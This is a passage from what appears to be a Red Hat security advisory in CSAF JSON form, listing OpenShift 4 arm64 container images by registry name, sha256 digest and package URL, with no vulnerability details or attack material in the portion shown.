"name": "registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:f5f3cef14751cc722c6d793f20f2f29e51dcb50eb0a27f182e1cb5cef0a169db_arm64",
"product_id": "registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:f5f3cef14751cc722c6d793f20f2f29e51dcb50eb0a27f182e1cb5cef0a169db_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-ironic-rhel9@sha256%3Af5f3cef14751cc722c6d793f20f2f29e51dcb50eb0a27f182e1cb5cef0a169db?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557454"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:3e31d1ece33dffbe5b4d54b888a2d16fe2137f6f35c99a7e5122ff8e0125250d_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:3e31d1ece33dffbe5b4d54b888a2d16fe2137f6f35c99a7e5122ff8e0125250d_arm64",
"product_id": "registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:3e31d1ece33dffbe5b4d54b888a2d16fe2137f6f35c99a7e5122ff8e0125250d_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-ironic-agent-rhel9@sha256%3A3e31d1ece33dffbe5b4d54b888a2d16fe2137f6f35c99a7e5122ff8e0125250d?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775601925"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:47995224ef8ebb0c96f589b4e65d0303ec25cdf337f1593443e5558f58820748_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:47995224ef8ebb0c96f589b4e65d0303ec25cdf337f1593443e5558f58820748_arm64",
"product_id": "registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:47995224ef8ebb0c96f589b4e65d0303ec25cdf337f1593443e5558f58820748_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-ironic-machine-os-downloader-rhel9@sha256%3A47995224ef8ebb0c96f589b4e65d0303ec25cdf337f1593443e5558f58820748?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775602311"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-ironic-static-ip-manager-rhel9@sha256:f2487a02cdd1eef6fb3b9462a39768a8f51110bf9321bc7229898a0c7d7dec4a_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-ironic-static-ip-manager-rhel9@sha256:f2487a02cdd1eef6fb3b9462a39768a8f51110bf9321bc7229898a0c7d7dec4a_arm64",
"product_id": "registry.redhat.io/openshift4/ose-ironic-static-ip-manager-rhel9@sha256:f2487a02cdd1eef6fb3b9462a39768a8f51110bf9321bc7229898a0c7d7dec4a_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-ironic-static-ip-manager-rhel9@sha256%3Af2487a02cdd1eef6fb3b9462a39768a8f51110bf9321bc7229898a0c7d7dec4a?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557261"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:4b6046eefed5840fa2ded2d2164a088ed3cfd22b50c2c05ebafd92a3190e1854_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:4b6046eefed5840fa2ded2d2164a088ed3cfd22b50c2c05ebafd92a3190e1854_arm64",
"product_id": "registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:4b6046eefed5840fa2ded2d2164a088ed3cfd22b50c2c05ebafd92a3190e1854_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-kube-proxy-rhel9@sha256%3A4b6046eefed5840fa2ded2d2164a088ed3cfd22b50c2c05ebafd92a3190e1854?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604683"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:3509c3e8eaea4bd214c01ad94d9f9f7ce342103e2cecbc1badacfe4b968946e5_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:3509c3e8eaea4bd214c01ad94d9f9f7ce342103e2cecbc1badacfe4b968946e5_arm64",
"product_id": "registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:3509c3e8eaea4bd214c01ad94d9f9f7ce342103e2cecbc1badacfe4b968946e5_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-kube-rbac-proxy-rhel9@sha256%3A3509c3e8eaea4bd214c01ad94d9f9f7ce342103e2cecbc1badacfe4b968946e5?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775563881"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:c0479910cf5b778058431462c989f6a84d45b12b90f7b8d5e6d041b685e15805_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:c0479910cf5b778058431462c989f6a84d45b12b90f7b8d5e6d041b685e15805_arm64",
"product_id": "registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:c0479910cf5b778058431462c989f6a84d45b12b90f7b8d5e6d041b685e15805_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-kube-state-metrics-rhel9@sha256%3Ac0479910cf5b778058431462c989f6a84d45b12b90f7b8d5e6d041b685e15805?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564691"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:730d5918dbf2f364e8528b6c8036541fbbee9e81c1bd5f6985f87b4602bc4579_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:730d5918dbf2f364e8528b6c8036541fbbee9e81c1bd5f6985f87b4602bc4579_arm64",
"product_id": "registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:730d5918dbf2f364e8528b6c8036541fbbee9e81c1bd5f6985f87b4602bc4579_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-operator-marketplace-rhel9@sha256%3A730d5918dbf2f364e8528b6c8036541fbbee9e81c1bd5f6985f87b4602bc4579?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564608"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:c2c1f73f4ec1f7b91ebfc39a4282dddae2978a79150523a9c72748f50f7a2d89_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:c2c1f73f4ec1f7b91ebfc39a4282dddae2978a79150523a9c72748f50f7a2d89_arm64",
"product_id": "registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:c2c1f73f4ec1f7b91ebfc39a4282dddae2978a79150523a9c72748f50f7a2d89_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-monitoring-plugin-rhel9@sha256%3Ac2c1f73f4ec1f7b91ebfc39a4282dddae2978a79150523a9c72748f50f7a2d89?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775577192"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:3ab735360773e6eb8e7f35088cb7420de0b815a84ca87a9135a6cf19e97b5c93_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:3ab735360773e6eb8e7f35088cb7420de0b815a84ca87a9135a6cf19e97b5c93_arm64",
"product_id": "registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:3ab735360773e6eb8e7f35088cb7420de0b815a84ca87a9135a6cf19e97b5c93_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-multus-cni-rhel9@sha256%3A3ab735360773e6eb8e7f35088cb7420de0b815a84ca87a9135a6cf19e97b5c93?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605333"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:77abdb2ebd4daa3e500f44aa6f65cd365dbc2d9d8874ca4793b9ee1a8b944b8e_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:77abdb2ebd4daa3e500f44aa6f65cd365dbc2d9d8874ca4793b9ee1a8b944b8e_arm64",
"product_id": "registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:77abdb2ebd4daa3e500f44aa6f65cd365dbc2d9d8874ca4793b9ee1a8b944b8e_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-multus-cni-microshift-rhel9@sha256%3A77abdb2ebd4daa3e500f44aa6f65cd365dbc2d9d8874ca4793b9ee1a8b944b8e?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572688"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:d17917fccd90b94767a9a92d871bb54204568272946691755015410ae7c8084a_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:d17917fccd90b94767a9a92d871bb54204568272946691755015410ae7c8084a_arm64",
"product_id": "registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:d17917fccd90b94767a9a92d871bb54204568272946691755015410ae7c8084a_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-multus-networkpolicy-rhel9@sha256%3Ad17917fccd90b94767a9a92d871bb54204568272946691755015410ae7c8084a?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572927"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:446e5456c05c7d2bec67d89593839412d80fb3ed2d3187999ad35cbe4bef6254_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:446e5456c05c7d2bec67d89593839412d80fb3ed2d3187999ad35cbe4bef6254_arm64",
"product_id": "registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:446e5456c05c7d2bec67d89593839412d80fb3ed2d3187999ad35cbe4bef6254_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-networking-console-plugin-rhel9@sha256%3A446e5456c05c7d2bec67d89593839412d80fb3ed2d3187999ad35cbe4bef6254?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775577127"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:46535766ac9cf5891d27f9ff7e0f237e6da936ec70eda335feb0daa7792be0a6_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:46535766ac9cf5891d27f9ff7e0f237e6da936ec70eda335feb0daa7792be0a6_arm64",
"product_id": "registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:46535766ac9cf5891d27f9ff7e0f237e6da936ec70eda335feb0daa7792be0a6_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-oauth-server-rhel9@sha256%3A46535766ac9cf5891d27f9ff7e0f237e6da936ec70eda335feb0daa7792be0a6?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605151"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:849b3cc7fe43ab6480fcd974e7796f5b8aa1e610add35558635b3c8afc602975_arm64",
"product": {
"name": "registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:849b3cc7fe43ab6480fcd974e7796f5b8aa1e610add35558635b3c8afc602975_arm64",
"product_id": "registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:849b3cc7fe43ab6480fcd974e7796f5b8aa1e610add35558635b3c8afc602975_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/oc-mirror-plugin-rhel9@sha256%3A849b3cc7fe43ab6480fcd974e7796f5b8aa1e610add35558635b3c8afc602975?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775565249"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:510a2039d88a9f1ae59848d4f6589b7585f002c68f0da8f8a970685d7fb40a5e_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:510a2039d88a9f1ae59848d4f6589b7585f002c68f0da8f8a970685d7fb40a5e_arm64",
"product_id": "registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:510a2039d88a9f1ae59848d4f6589b7585f002c68f0da8f8a970685d7fb40a5e_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-docker-builder-rhel9@sha256%3A510a2039d88a9f1ae59848d4f6589b7585f002c68f0da8f8a970685d7fb40a5e?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606800"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cli-rhel9@sha256:5a96f6965efd6579efde9b1a1b4ae88b57cbb49f38cf2a39ef90a55470a30667_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cli-rhel9@sha256:5a96f6965efd6579efde9b1a1b4ae88b57cbb49f38cf2a39ef90a55470a30667_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cli-rhel9@sha256:5a96f6965efd6579efde9b1a1b4ae88b57cbb49f38cf2a39ef90a55470a30667_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cli-rhel9@sha256%3A5a96f6965efd6579efde9b1a1b4ae88b57cbb49f38cf2a39ef90a55470a30667?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775563791"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-console-rhel9@sha256:2c8bfcde38a23b93e8474a20f98c6dd58b6fbd1d5c0773a45cab9e56f8796cc3_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-console-rhel9@sha256:2c8bfcde38a23b93e8474a20f98c6dd58b6fbd1d5c0773a45cab9e56f8796cc3_arm64",
"product_id": "registry.redhat.io/openshift4/ose-console-rhel9@sha256:2c8bfcde38a23b93e8474a20f98c6dd58b6fbd1d5c0773a45cab9e56f8796cc3_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-console-rhel9@sha256%3A2c8bfcde38a23b93e8474a20f98c6dd58b6fbd1d5c0773a45cab9e56f8796cc3?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775630129"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:c185f56cb3ae0d3f522cc459da340e3b939bbdd1543258c6a2e7cf87f2045c7b_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:c185f56cb3ae0d3f522cc459da340e3b939bbdd1543258c6a2e7cf87f2045c7b_arm64",
"product_id": "registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:c185f56cb3ae0d3f522cc459da340e3b939bbdd1543258c6a2e7cf87f2045c7b_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-console-rhel9-operator@sha256%3Ac185f56cb3ae0d3f522cc459da340e3b939bbdd1543258c6a2e7cf87f2045c7b?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606311"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:ab94610c1dd35f92ad186846735758cf5a301d9bc4e883b2692011988edb4fd3_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:ab94610c1dd35f92ad186846735758cf5a301d9bc4e883b2692011988edb4fd3_arm64",
"product_id": "registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:ab94610c1dd35f92ad186846735758cf5a301d9bc4e883b2692011988edb4fd3_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-deployer-rhel9@sha256%3Aab94610c1dd35f92ad186846735758cf5a301d9bc4e883b2692011988edb4fd3?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775577046"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:fb23578b8ce937223392967c69b130551572dfab261815242d42ab090f999853_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:fb23578b8ce937223392967c69b130551572dfab261815242d42ab090f999853_arm64",
"product_id": "registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:fb23578b8ce937223392967c69b130551572dfab261815242d42ab090f999853_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-haproxy-router-rhel9@sha256%3Afb23578b8ce937223392967c69b130551572dfab261815242d42ab090f999853?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775577060"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:fb2ea87732bd32c58d57656d38d3393bc7c48bb6edc41bc23464dc25ec2c72b7_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:fb2ea87732bd32c58d57656d38d3393bc7c48bb6edc41bc23464dc25ec2c72b7_arm64",
"product_id": "registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:fb2ea87732bd32c58d57656d38d3393bc7c48bb6edc41bc23464dc25ec2c72b7_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-hyperkube-rhel9@sha256%3Afb2ea87732bd32c58d57656d38d3393bc7c48bb6edc41bc23464dc25ec2c72b7?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557435"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:f51f73917d40e7fc6eab7e9700eb2c253f16c62173d103eb6b38daba651e17cf_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:f51f73917d40e7fc6eab7e9700eb2c253f16c62173d103eb6b38daba651e17cf_arm64",
"product_id": "registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:f51f73917d40e7fc6eab7e9700eb2c253f16c62173d103eb6b38daba651e17cf_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-keepalived-ipfailover-rhel9@sha256%3Af51f73917d40e7fc6eab7e9700eb2c253f16c62173d103eb6b38daba651e17cf?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604322"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-pod-rhel9@sha256:0df3b71023897418a185bfc7a38f4f67e0a41b6733452fefd59c9d7edbec3df6_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-pod-rhel9@sha256:0df3b71023897418a185bfc7a38f4f67e0a41b6733452fefd59c9d7edbec3df6_arm64",
"product_id": "registry.redhat.io/openshift4/ose-pod-rhel9@sha256:0df3b71023897418a185bfc7a38f4f67e0a41b6733452fefd59c9d7edbec3df6_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-pod-rhel9@sha256%3A0df3b71023897418a185bfc7a38f4f67e0a41b6733452fefd59c9d7edbec3df6?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572233"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:c1de6ec5108a02b21c15f44308fc3a9b4293f94353c0f25f11576a74fb21ce5d_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:c1de6ec5108a02b21c15f44308fc3a9b4293f94353c0f25f11576a74fb21ce5d_arm64",
"product_id": "registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:c1de6ec5108a02b21c15f44308fc3a9b4293f94353c0f25f11576a74fb21ce5d_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-docker-registry-rhel9@sha256%3Ac1de6ec5108a02b21c15f44308fc3a9b4293f94353c0f25f11576a74fb21ce5d?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605796"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-tests-rhel9@sha256:6440ce5a0f8c34fea0b65fd43d8415c03d2c8c074f47efab4a2e47182a126c38_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-tests-rhel9@sha256:6440ce5a0f8c34fea0b65fd43d8415c03d2c8c074f47efab4a2e47182a126c38_arm64",
"product_id": "registry.redhat.io/openshift4/ose-tests-rhel9@sha256:6440ce5a0f8c34fea0b65fd43d8415c03d2c8c074f47efab4a2e47182a126c38_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-tests-rhel9@sha256%3A6440ce5a0f8c34fea0b65fd43d8415c03d2c8c074f47efab4a2e47182a126c38?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775578545"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:d14dd6230f53078a6cf0d3b1528d0d22995add08578ab3da323a4ff92d13cc31_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:d14dd6230f53078a6cf0d3b1528d0d22995add08578ab3da323a4ff92d13cc31_arm64",
"product_id": "registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:d14dd6230f53078a6cf0d3b1528d0d22995add08578ab3da323a4ff92d13cc31_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-openshift-state-metrics-rhel9@sha256%3Ad14dd6230f53078a6cf0d3b1528d0d22995add08578ab3da323a4ff92d13cc31?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604183"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:cba950803b92bd6bd4edf5f6e4c6f6f92cc899132e530d2508d142deeb9366cd_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:cba950803b92bd6bd4edf5f6e4c6f6f92cc899132e530d2508d142deeb9366cd_arm64",
"product_id": "registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:cba950803b92bd6bd4edf5f6e4c6f6f92cc899132e530d2508d142deeb9366cd_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-openstack-cluster-api-controllers-rhel9@sha256%3Acba950803b92bd6bd4edf5f6e4c6f6f92cc899132e530d2508d142deeb9366cd?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606714"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:87546cc6262c2c6eadb54266c42ccc03c3e2ad7c3c809ee21529f0bfb4707105_arm64",
"product": {
"name": "registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:87546cc6262c2c6eadb54266c42ccc03c3e2ad7c3c809ee21529f0bfb4707105_arm64",
"product_id": "registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:87546cc6262c2c6eadb54266c42ccc03c3e2ad7c3c809ee21529f0bfb4707105_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/openstack-resource-controller-rhel9@sha256%3A87546cc6262c2c6eadb54266c42ccc03c3e2ad7c3c809ee21529f0bfb4707105?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606963"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:a97b0c4ab3e8716aadd8773aac0e95cb23aaaf6b618a2f759a1a53ecf078345f_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:a97b0c4ab3e8716aadd8773aac0e95cb23aaaf6b618a2f759a1a53ecf078345f_arm64",
"product_id": "registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:a97b0c4ab3e8716aadd8773aac0e95cb23aaaf6b618a2f759a1a53ecf078345f_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-operator-lifecycle-manager-rhel9@sha256%3Aa97b0c4ab3e8716aadd8773aac0e95cb23aaaf6b618a2f759a1a53ecf078345f?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604626"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:43aa5f0fe9244c1aaf3912b184ffee644522a2ff3bd3aadd53db5b90b0c93c76_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:43aa5f0fe9244c1aaf3912b184ffee644522a2ff3bd3aadd53db5b90b0c93c76_arm64",
"product_id": "registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:43aa5f0fe9244c1aaf3912b184ffee644522a2ff3bd3aadd53db5b90b0c93c76_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-operator-registry-rhel9@sha256%3A43aa5f0fe9244c1aaf3912b184ffee644522a2ff3bd3aadd53db5b90b0c93c76?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775565149"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:b3351e1878d5ef1111ce4b2eca74bad875b8773b11b8597f83c11a7f7b226da7_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:b3351e1878d5ef1111ce4b2eca74bad875b8773b11b8597f83c11a7f7b226da7_arm64",
"product_id": "registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:b3351e1878d5ef1111ce4b2eca74bad875b8773b11b8597f83c11a7f7b226da7_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-agent-installer-api-server-rhel9@sha256%3Ab3351e1878d5ef1111ce4b2eca74bad875b8773b11b8597f83c11a7f7b226da7?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606032"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:5727ab378cdf09a1eb20b6120da5ee6d66a1473ea0d7dfd0709faf5c53df615f_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:5727ab378cdf09a1eb20b6120da5ee6d66a1473ea0d7dfd0709faf5c53df615f_arm64",
"product_id": "registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:5727ab378cdf09a1eb20b6120da5ee6d66a1473ea0d7dfd0709faf5c53df615f_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-agent-installer-csr-approver-rhel9@sha256%3A5727ab378cdf09a1eb20b6120da5ee6d66a1473ea0d7dfd0709faf5c53df615f?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572826"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:a676ed9f3d05a12ca0965f8b33d002d95cc8578f5a74f0bcf984594d784b0e3c_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:a676ed9f3d05a12ca0965f8b33d002d95cc8578f5a74f0bcf984594d784b0e3c_arm64",
"product_id": "registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:a676ed9f3d05a12ca0965f8b33d002d95cc8578f5a74f0bcf984594d784b0e3c_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-agent-installer-node-agent-rhel9@sha256%3Aa676ed9f3d05a12ca0965f8b33d002d95cc8578f5a74f0bcf984594d784b0e3c?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606441"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:0104fa2a05916db8ce121350b3e026a74891560be71999451943090f63d727a2_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:0104fa2a05916db8ce121350b3e026a74891560be71999451943090f63d727a2_arm64",
"product_id": "registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:0104fa2a05916db8ce121350b3e026a74891560be71999451943090f63d727a2_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-agent-installer-orchestrator-rhel9@sha256%3A0104fa2a05916db8ce121350b3e026a74891560be71999451943090f63d727a2?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572582"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:2ad51487bd9dd02bdabe506d2c5758a9e9df2903a8a63d1a19d720281390eebc_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:2ad51487bd9dd02bdabe506d2c5758a9e9df2903a8a63d1a19d720281390eebc_arm64",
"product_id": "registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:2ad51487bd9dd02bdabe506d2c5758a9e9df2903a8a63d1a19d720281390eebc_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-agent-installer-utils-rhel9@sha256%3A2ad51487bd9dd02bdabe506d2c5758a9e9df2903a8a63d1a19d720281390eebc?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604573"
}
}
},
{
"category": "product_version",
